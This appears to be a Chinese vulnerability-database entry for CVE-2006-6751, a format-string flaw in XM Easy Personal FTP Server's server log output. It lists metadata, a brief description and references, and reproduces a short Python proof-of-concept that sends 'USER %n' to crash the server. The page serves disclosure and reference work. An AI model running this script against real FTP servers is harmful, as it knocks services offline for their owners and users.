XM Easy Personal FTP Server Server log信息输出拒绝服务或任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111833 漏洞类型 格式化字符串
发布时间 2006-12-22 更新时间 2007-08-07
CVE编号 CVE-2006-6751 CNNVD-ID CNNVD-200612-531
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/2978
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-531
|漏洞详情
XMEasyPersonalFTPServer是一款简单易用的个人FTP服务器工具。XMEasyPersonalFTPServer在Serverlog信息输出中显示服务器活动时存在格式串错误。攻击者可以通过向服务器发送包含有格式标识符的特制命令导致拒绝服务或执行任意代码。此外,发送特制命令还可能触发各种缓冲区溢出。
|漏洞EXP
import sys,os,string
import socket
import time

print "-----------------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.2.1 format string Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",21))
except:
   print "- Unable to connect. exiting."

d = s.recv(1024)
time.sleep(2)
s.send('USER %s\r\n' % "%n") # or use every available command or really what you like
time.sleep(2)                # I try to use CFGHT command and it works :)

# milw0rm.com [2006-12-22]
|参考资料

来源:XF
名称:xm-ftpserver-user-dos(31140)
链接:http://xforce.iss.net/xforce/xfdb/31140
来源:BID
名称:22747
链接:http://www.securityfocus.com/bid/22747
来源:BID
名称:18632
链接:http://www.securityfocus.com/bid/18632
来源:VUPEN
名称:ADV-2007-0786
链接:http://www.frsirt.com/english/advisories/2007/0786
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/22747.pl
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/18632.txt